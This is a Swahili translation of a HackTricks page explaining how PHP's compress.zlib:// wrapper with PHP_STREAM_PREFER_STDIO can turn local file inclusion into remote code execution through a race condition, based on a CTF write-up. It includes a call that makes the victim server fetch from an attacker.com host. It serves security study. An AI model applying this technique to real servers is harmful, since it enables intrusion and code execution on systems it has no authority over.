# LFI2RCE Kupitia compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Kufichua Njia

<details>

<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

#### [WhiteIntel](https://whiteintel.io)

<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.

Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:

{% embed url="https://whiteintel.io" %}

***

### `compress.zlib://` na `PHP_STREAM_PREFER_STDIO`

Faili iliyofunguliwa kwa kutumia itifaki ya `compress.zlib://` na bendera `PHP_STREAM_PREFER_STDIO` inaweza kuendelea kuandika data inayofika kwenye uhusiano baadaye kwenye faili hiyo hiyo.

Hii inamaanisha kwamba wito kama:
```php
file_get_contents("compress.zlib://http://attacker.com/file")
```
Utatuma ombi ukiomba http://attacker.com/file, kisha server inaweza kujibu ombi hilo na jibu sahihi la HTTP, kuweka uhusiano wazi, na kutuma data ziada baadaye ambayo itaandikwa pia kwenye faili.

Unaweza kuona habari hiyo katika sehemu hii ya msimbo wa php-src katika main/streams/cast.c:
```c
/* Use a tmpfile and copy the old streams contents into it */

if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_fopen_tmpfile();
} else {
*newstream = php_stream_temp_new();
}
```
### Mashindano ya Mashindano hadi RCE

[**CTF hii**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) ilishughulikiwa kwa kutumia hila iliyopita.

Mshambuliaji atafanya **seva ya mwathirika ifungue uhusiano ikisoma faili kutoka kwa seva ya mshambuliaji** kwa kutumia itifaki ya **`compress.zlib`**.

**Wakati** huu **uhusiano** ukiwepo mshambuliaji atafanya **kuvuja njia** ya faili ya muda iliyoundwa (inavuja na seva).

**Wakati** **uhusiano** bado uko wazi, mshambuliaji atatumia LFI kwa **kupakia faili ya muda** ambayo anadhibiti.

Hata hivyo, kuna ukaguzi kwenye seva ya wavuti ambao **unazuia kupakia faili zinazoleta `<?`**. Kwa hivyo, mshambuliaji atatumia **Race Condition**. Katika uhusiano ambao bado uko wazi **mshambuliaji** atatuma mzigo wa PHP **BAADA YA** **wavuti** kuchunguza ikiwa faili ina herufi zilizopigwa marufuku lakini **KABLA haijapakia maudhui yake**.

Kwa habari zaidi angalia maelezo ya Race Condition na CTF kwenye [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)

#### [WhiteIntel](https://whiteintel.io)

<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.

Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:

{% embed url="https://whiteintel.io" %}

<details>

<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 **kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>